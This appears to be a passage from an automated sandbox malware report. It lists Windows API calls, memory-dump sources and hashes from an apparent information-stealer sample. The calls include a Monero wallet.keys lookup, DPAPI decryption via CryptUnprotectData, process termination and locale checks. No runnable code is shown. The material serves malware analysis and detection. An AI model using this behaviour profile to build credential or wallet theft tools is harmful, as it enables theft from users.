                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E815A8,00E80BAF), ref: 00E6DBEB
                                  • StrCmpCA.SHLWAPI(?,00E815AC), ref: 00E6DC33
                                  • StrCmpCA.SHLWAPI(?,00E815B0), ref: 00E6DC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6DECC
                                  • FindClose.KERNEL32(000000FF), ref: 00E6DEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 45fba452b1e67672c75e896437e9adb7d7d867b36e911855dfe77bdeafdd88f6
                                  • Instruction ID: 791812ff98120b822020f20f4dfb97872b6e6eedefb08bf1cf5a23b45375066d
                                  • Opcode Fuzzy Hash: 45fba452b1e67672c75e896437e9adb7d7d867b36e911855dfe77bdeafdd88f6
                                  • Instruction Fuzzy Hash: A1911172A001089BCB14FB70ED56DED73BDABD4340F4495B8F91BA6185EE349B48CB92
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E79905
                                  • Process32First.KERNEL32(00E69FDE,00000128), ref: 00E79919
                                  • Process32Next.KERNEL32(00E69FDE,00000128), ref: 00E7992E
                                  • StrCmpCA.SHLWAPI(?,00E69FDE), ref: 00E79943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00E79987
                                  • CloseHandle.KERNEL32(00E69FDE), ref: 00E79993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 506048ca94842b9f2be893abad0e77b5039c1af7268bac3496136901b3df9504
                                  • Instruction ID: be018d2c070c9ccd8aade80f0905c8e1a040a51f57f2fc36d455770b2b93fdba
                                  • Opcode Fuzzy Hash: 506048ca94842b9f2be893abad0e77b5039c1af7268bac3496136901b3df9504
                                  • Instruction Fuzzy Hash: D011F1B5900218EBDB24DFA4DC49BDDB7B9BF88705F00859CF619A6284DB749B84CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2 w=$:$y$@5>$$@SNu$AQ,$cg|R$fsz$ph6
                                  • API String ID: 0-687166904
                                  • Opcode ID: abe3fe33d303703c1d939b52a6a0246e6729ce399f214607c2e382216c1912b6
                                  • Instruction ID: 77e3cd0bc0e21196af956badb14d2254e1a251591d101681ce207d862913e0fd
                                  • Opcode Fuzzy Hash: abe3fe33d303703c1d939b52a6a0246e6729ce399f214607c2e382216c1912b6
                                  • Instruction Fuzzy Hash: F2B2E6F390C2049FE304AE2DEC8576ABBE9EF94720F1A493DE6C4D3744EA3558058696
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00E805B7), ref: 00E77D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E77D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E77D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E77DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00E77EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 717d355a33354956ee8c19230ffb715ae977eb0ff424f8d0ffe6122384fef31b
                                  • Instruction ID: 9108546d005f553757b03dc9ffb63e49c9123fd094dcc144d40853899221ccf6
                                  • Opcode Fuzzy Hash: 717d355a33354956ee8c19230ffb715ae977eb0ff424f8d0ffe6122384fef31b
                                  • Instruction Fuzzy Hash: E8411B71940218ABDB24DB94DC99BEEB7B4FB44700F2091E9E10E76281DB746F84CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &xN$*({{$=~k$Mu$W@~~$YN?$gi{
                                  • API String ID: 0-3092782290
                                  • Opcode ID: 60773bd72df35b3292dd214d6151e6e06512c7d39a1fec98d19b7d5adbe9bbfe
                                  • Instruction ID: 6843678fcb3c70f135e678077b2467454afa8c64ffd5f61de3e4d1137b8d4e2f
                                  • Opcode Fuzzy Hash: 60773bd72df35b3292dd214d6151e6e06512c7d39a1fec98d19b7d5adbe9bbfe
                                  • Instruction Fuzzy Hash: AEB2F5F3A0C2049FE304AE2DEC8567AFBE9EF94720F16453DEAC487744EA3558058697
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E80D79), ref: 00E6E5A2
                                  • StrCmpCA.SHLWAPI(?,00E815F0), ref: 00E6E5F2
                                  • StrCmpCA.SHLWAPI(?,00E815F4), ref: 00E6E608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6ECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 92789802fb1c3647de152d6dd6d75abb412a8a47fda39f882e69941d760b29ae
                                  • Instruction ID: 28bc96071e3302271ac626fce4c318ca9631c720603d4c626a8432de1485cc15
                                  • Opcode Fuzzy Hash: 92789802fb1c3647de152d6dd6d75abb412a8a47fda39f882e69941d760b29ae
                                  • Instruction Fuzzy Hash: 91123371A101189BDB19FB60DDA6EED73B9AF94300F4895F9B50E72091EE306B48CB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 15no$;w~$?ih$F]/9$^_ke$8G
                                  • API String ID: 0-657738206
                                  • Opcode ID: fe5226a5d1e458e7db98bb3302482fe9b1d9b8c210f1edf47291f4478e0cfc87
                                  • Instruction ID: bb7b5bbc5d813a45963b2c01ca5455ef3bdde474246873e22cb44f0375d9ded0
                                  • Opcode Fuzzy Hash: fe5226a5d1e458e7db98bb3302482fe9b1d9b8c210f1edf47291f4478e0cfc87
                                  • Instruction Fuzzy Hash: 9FB207F360C204AFE3046E2DEC8567AFBE9EFD4320F164A3DEAC487744E67558058696
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00E64F3E,00000000,?), ref: 00E6A251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E6A27A
                                  • LocalFree.KERNEL32(?,?,?,?,00E64F3E,00000000,?), ref: 00E6A28F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >O
                                  • API String ID: 4291131564-1870091082
                                  • Opcode ID: 523cc65547765c73c029aa6ce9f9b56bfe54e0c6ac45974d730a677a7fd746bc
                                  • Instruction ID: a194704ed3b16c238023ff8802f7a1e163bdb76066cfaaeff3fe6906ec74b37b
                                  • Opcode Fuzzy Hash: 523cc65547765c73c029aa6ce9f9b56bfe54e0c6ac45974d730a677a7fd746bc
                                  • Instruction Fuzzy Hash: F011D4B4640308AFEB15CF64D895FAA77B5EB88B04F208458FD15AB3D4C772A941CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4Kz$S|l3$b~/;$d,n_$q?C
                                  • API String ID: 0-690943083
                                  • Opcode ID: cf7ce04e17c533e62f8eb49a9ca74dafee3daf6479762248d78f609075bf8afa
                                  • Instruction ID: c9dff82ad214f2797dd3ead7dcbce09fa917ccee758839a620cf2939b3172a81
                                  • Opcode Fuzzy Hash: cf7ce04e17c533e62f8eb49a9ca74dafee3daf6479762248d78f609075bf8afa
                                  • Instruction Fuzzy Hash: E7B238F3A0C2049FE304AE2DEC8567AB7E9EFD4320F1A453DE6C4C7744EA7558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *\w$KH>$`69o$%~$L~z
                                  • API String ID: 0-214446007
                                  • Opcode ID: a5699d0eb267e11fde6953f31edf66860a5298223a356e0de448f0572009921c
                                  • Instruction ID: 3f46b364fd70a4edd49322d7c9cec2a0c31f5461794af6030c6a4b6ab7be8c65
                                  • Opcode Fuzzy Hash: a5699d0eb267e11fde6953f31edf66860a5298223a356e0de448f0572009921c
                                  • Instruction Fuzzy Hash: 97B2F7F360C2149FE304AE2DEC8567AFBE9EF94720F16493DEAC4C7744EA3558018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 1518636bd6fdd732a2a1ac1666e9233fa0a5331513738d1ea764c0d4406f942c
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 15418E12E09BC9C5CB058B7445A02EEBFB26FD6210F6D42AEC49D2F382C775814BD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E6C971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E6C97C
                                  • lstrcat.KERNEL32(?,00E80B47), ref: 00E6CA43
                                  • lstrcat.KERNEL32(?,00E80B4B), ref: 00E6CA57
                                  • lstrcat.KERNEL32(?,00E80B4E), ref: 00E6CA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 18088e51acd286212438e02009c2a73cd8c8c33b677847a6d390fc26fd1a50b3
                                  • Instruction ID: 11a54101b34a5c6f66016e01e300662c68fa5945a97c1a691320498449c6f727
                                  • Opcode Fuzzy Hash: 18088e51acd286212438e02009c2a73cd8c8c33b677847a6d390fc26fd1a50b3
                                  • Instruction Fuzzy Hash: 72414CB590421E9BDB24DFA0DD89BFEF7B8AB48344F1041A8E509B6284D7745A84CF91
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00E76C0C
                                  • sscanf.NTDLL ref: 00E76C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E76C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E76C60
                                  • ExitProcess.KERNEL32 ref: 00E76C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: ebcb6aaf76b9fb6822c6d6c815f3ce09cf3b7535d0bf5438e2a1674eb20a3c3e
                                  • Instruction ID: e0f4b37777200f2d47eb1e1c8880cc45c904cdccf27139a1c1218ceca6e99d76
                                  • Opcode Fuzzy Hash: ebcb6aaf76b9fb6822c6d6c815f3ce09cf3b7535d0bf5438e2a1674eb20a3c3e
                                  • Instruction Fuzzy Hash: 2521EDB5D04209ABCF58EFE4E8459EEB7B5FF48304F048529E51AB3254EB349648CB64
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E672AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E672B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E672E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E67304
                                  • LocalFree.KERNEL32(?), ref: 00E6730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 76133e4daf30e1c90c2ce46d56e89751ec8f51995020934f65579c472580ed08
                                  • Instruction ID: 9e359697ad3acf00ad841d99797ab82d08fb3d08a2f49e43b068ee94ba1f9799
                                  • Opcode Fuzzy Hash: 76133e4daf30e1c90c2ce46d56e89751ec8f51995020934f65579c472580ed08
                                  • Instruction Fuzzy Hash: AD011EB5A84308BBDB24DFE4DC46F9E77B8EB44B04F104554FB15BB2C8D6B0AA409B64
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E797AE
                                  • Process32First.KERNEL32(00E80ACE,00000128), ref: 00E797C2
                                  • Process32Next.KERNEL32(00E80ACE,00000128), ref: 00E797D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00E797EC
                                  • CloseHandle.KERNEL32(00E80ACE), ref: 00E7980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 68ef4cfd5e796cc2a2732bb858e89fdb04194aaa47c89caabb62b769c4c08415
                                  • Instruction ID: 24582b053f110e544b73eb793a3860505b00bfc9af234876eb70466d9d3e682d
                                  • Opcode Fuzzy Hash: 68ef4cfd5e796cc2a2732bb858e89fdb04194aaa47c89caabb62b769c4c08415
                                  • Instruction Fuzzy Hash: 9A0121B5A10208EBEB28DFA4D944BEDB7F9BF08700F108599E509E7284DB309B80CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 0b4b1464afc0634d8d2033b0489ac61830e1d8ec97bfd4902855924fcb8dee6e
                                  • Instruction ID: 5145b27117c992492680ff2d4720e1e5cb054ad0c8990ed48b2e040d50c13d7e
